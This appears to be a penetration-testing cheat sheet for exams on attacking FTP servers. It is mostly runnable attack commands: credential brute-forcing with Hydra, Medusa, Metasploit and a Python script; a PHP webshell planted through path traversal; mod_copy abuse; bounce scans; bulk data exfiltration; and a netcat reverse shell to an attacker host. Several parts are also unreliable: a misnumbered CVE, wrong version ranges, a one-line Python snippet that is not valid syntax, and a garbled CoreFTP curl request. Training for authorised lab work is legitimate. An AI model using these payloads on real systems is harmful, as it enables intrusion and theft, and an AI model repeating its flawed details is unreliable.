FTP

Learning Objectives:

• Understand FTP protocol basics, modes (Active/Passive), and common misconfigurations.

• Perform comprehensive enumeration and brute-forcing.

• Exploit legacy and modern vulns, including bounce attacks and file writes.

• Automate tasks for efficiency in time-constrained exams.

• Chain FTP exploits to RCE or pivoting.

Practice Tips:

• Use vulnerable VMs like DVWA, Metasploitable, or VulnHub's FTP-specific boxes.

• Labs: TryHackMe's "FTP" room, HackTheBox's "Resolute" (for FTPS chaining).

• Common Pitfalls: Firewall blocks on data ports (21/20); assume Passive mode; always check for FTPS (port 990).

• Exam Scenario: Enumerate an open FTP, brute-force creds, upload a webshell, and escalate via misconfig.

FTP Protocol Overview

The File Transfer Protocol (FTP) is a standard for transferring files over TCP/IP networks. It supports directory/file ops (e.g., ls, cd, get/put) and operates in Active (server initiates data connection) or Passive (client initiates) modes.

Default ports: Control: TCP/21,

Data: TCP/20 (Active) or ephemeral (Passive). FTPS (FTP over SSL/TLS) uses TCP/990 (implicit) or 21 (explicit).

Attacks target: Misconfigs (anonymous access), weak auth, vulns (e.g., buffer overflows), or abuse (bounce/port scans).

Always start with recon to map the attack surface. 0. Initial Service Discovery

# Basic service scan with version detection
sudo nmap -sC -sV -p 21 --script-args=unsafe=1 -T4 <TARGET-IP>

# Aggressive scan for maximum information
sudo nmap -A -p 21 -T4 <TARGET-IP>

# Quick banner grab with netcat
nc -nv <TARGET-IP> 21

1. Enumeration & Recon

Identify FTP services, versions, and low-hanging fruit like anonymous access.

• Nmap Scanning (Enhanced) Basic script scan + version detection + aggressive scripting for FTP-specific checks (e.g., anonymous login attempts).

sudo nmap -sC -sV --script ftp-anon,ftp-bounce,ftp-ftps,ftp-vuln* -p 21,20,990 <FQDN/IP>

Why improved: Adds scripts for vuln detection (e.g., CVE-1999-0017 for bounce) and FTPS support.

• Banner Grabbing (Manual) Extract version/info from raw banner for targeted exploits.

telnet <FQDN/IP> 21  # Or nc -v <FQDN/IP> 21; type 'QUIT' to exit

Output example: "220 ProFTPD 1.3.5 Server (Example)". Tip: Cross-reference with Exploit-DB for CVEs (e.g., search "ProFTPD 1.3.5").

• Anonymous Authentication Check Test default/public access (common in misconfigs).

ftp <FQDN/IP>
# At login prompt: 
Name: anonymous | Password: anonymous (or blank/guest)
# Post-login: 
ls -la  
# Enumerate files/dirs for sensitive data (e.g., .ssh keys)

Enhanced: If successful, download all: mget * or script with lftp -u anonymous,anonymous IP -e "mirror; quit".

• User Enumeration via Error Messages Probe for valid users by observing login responses (some servers leak via "530 Invalid user").

# Python one-liner (or use ftplib module)
python3 -c "import ftplib; f=ftplib.FTP('<IP>'); try: f.login('admin',''); print('Valid user') except: print('Invalid')"

Tip: Chain with wordlists /usr/share/wordlists/dirb/common.txt for usernames.

2. Brute-Force Attacks

Target weak creds. Use rate-limiting evasion (e.g., delays) in exams.

• Hydra (Improved Syntax) Multi-threaded, supports FTP/FTPS.

# Single user brute force
hydra -l <username> -P /usr/share/wordlists/rockyou.txt ftp://<TARGET-IP> -t 4 -V

# User list brute force
hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt \
      -P /usr/share/wordlists/rockyou.txt ftp://<TARGET-IP> -t 4
      # For FTPS: hydra ... ftps://<IP>:990

Why better: Added user list (-L); -t limits threads to avoid DoS flags.

• Medusa Parallel brute-forcer.

medusa -h <TARGET-IP> -U /path/to/userlist -P /path/to/passwordlist -M ftp -F

medusa -h <FQDN/IP> -u admin -P /usr/share/wordlists/rockyou.txt -M ftp -T 10

Enhanced: -T for threads; test multiple users with -U file.

• Metasploit FTP Login Modular scanner for integration with exploits.

msfconsole -q
use auxiliary/scanner/ftp/ftp_login
set RHOSTS <IP>
set USER_FILE /usr/share/wordlists/dirb/common.txt
set PASS_FILE /usr/share/wordlists/rockyou.txt
set STOP_ON_SUCCESS true
set THREADS 5
run

On success, note creds for later use.

• Automated Python Brute-Force (New: Scripting for Exams) Custom script for stealthy, resumable attacks.

import ftplib
import sys
    
host = '<IP>'
userlist = open('/usr/share/wordlists/dirb/common.txt').readlines()
passlist = open('/usr/share/wordlists/rockyou.txt').readlines()
    
for user in userlist:
    user = user.strip()
    for passwd in passlist[:10]:  # Limit for demo; remove in practice
        passwd = passwd.strip()
        try:
            ftp = ftplib.FTP(host)
            ftp.login(user, passwd)
            print(f'Success: {user}:{passwd}')
            ftp.quit()
            sys.exit(0)
        except ftplib.error_perm:
            pass

Run: python3 ftp_brute.py. Tip: Add delays (time.sleep(1)) to evade locks.

3. Exploitation Techniques

Exploit vulns or abuse features for RCE/access.

• FTP Bounce Attack (Port Scanning) Uses an FTP server as a proxy to scan internal hosts.

nmap -Pn -n -v -p 80 -b <IP>:21:anonymous:anonymous <target_internal_IP>
# Or manual: nc <FTP_IP> 21; PORT <internal_IP>,80; RETR /etc/passwd (triggers bounce)

Enhanced: Specify creds explicitly; test on closed ports for stealth.

• CoreFTP Arbitrary File Write (Path Traversal) Exploits weak path handling for out-of-dir writes (CVE-2012-4921 variant).

curl -k --insecure -X PUT -H "Host: <IP>" --basic -u <user>:<pass> --data-binary "<?php system(\$_GET['cmd']); ?>" --path-as-is "https://<IP>:990/../../../../../../../var/www/html/shell.php"

Why improved: Added PHP webshell payload; use for FTPS (-k for SSL). Verify: curl http://IP/shell.php?cmd=id.

• ProFTPD Mod_Copy RCE (New: Common Vuln Exploit) CVE-2021-46875: Remote command execution via copy.

# Manual (post-auth)
SITE CPFR /etc/passwd
SITE CPTO /var/www/html/pwned.txt  # Copies file; chain to webshell upload

Metasploit: use exploit/unix/ftp/proftpd_modcopy_exec; set RHOSTS IP; exploit. Exam tip: Check Nmap for ProFTPD versions <1.3.5.

• Directory Traversal & Webshell Upload (Post-Auth Abuse) After login, escape root and upload payloads.

 # Via FTP client
cd ../../../../../../var/www/html  # Traverse up/down
put shell.php  # Local file: <?php system($_GET['c']); ?>

Automated: lftp -u user,pass IP -e "cd ../../../../var/www/html; put shell.php; quit". Trigger: curl http://IP/shell.php?c=whoami. Pitfall: Ensure the web server runs on the same host.

• FTPS-Specific Attacks (SSL/TLS Weaknesses) If FTPS is detected, target weak ciphers or cert issues.

# Test SSL with nmap
nmap --script ssl-cert,ssl-enum-ciphers -p 990 <IP>
# Brute with sslscan or testssl.sh
testssl.sh <IP>:990

Exploit: Use openssl s_client -connect IP:990 -cipher LOW to force weak ciphers for MiTM.

4. Post-Exploitation & Pivoting

Leverage access for deeper access.

• FTP Client Commands Manual File System Interaction Core ops + advanced for data exfil/escalation.

# Essential commands:
status                  # Connection status
pwd                      # Print working directory
ls -la                  # List with details (perms, owners)
cd <dir> / pwd          # Navigate; print working dir
get <file>              # Download (e.g., get config.ini)
mget *.txt *.conf       # Multi-download patterns
put <local>             # Upload (e.g., put /tmp/backdoor)
mput *.php              # Multi-upload
mkdir <dir> / rmdir <dir>  # Create/delete dirs
rename <old> <new>      # Rename for evasion
quote "SITE CHMOD 777 <file>"  # Change perms (if supported)
help / ?                # Command help
quit                    # Exit

Use Passive mode (passive) if Active fails. Automated Data Exfiltration

# Recursive download with wget
wget -m --ftp-user=<username> --ftp-password=<password> ftp://<TARGET-IP>/

# Recursive mirror with lftp
lftp -u <username>,<password> -p 21 <TARGET-IP>
mirror / /local/path/

• Pivoting via FTP (Network Abuse): Upload nc/SSH keys for reverse shells.

# Upload and exec (if writable /tmp)
put nc.exe  # Then: nc -e /bin/sh <attacker_IP> 4444

Chain: Use for internal scans: nmap -sT -p 445 <internal_range> --source-port 21 (spoof via bounce).

Training Drills & Review

1. Hands-On Lab: Set up Metasploitable2; run full workflow (enumerate → brute → exploit → shell).

2. Scenario Quiz: "FTP on 21 is anon-enabled, but FTPS on 990 has weak creds—how to chain?" (Ans: Brute FTPS, upload to web root).

3. Time It: Aim for <10 min full attack in exam sims.

4. Resources: OWASP FTP Cheat Sheet, SANS SEC560 notes, Exploit-DB searches.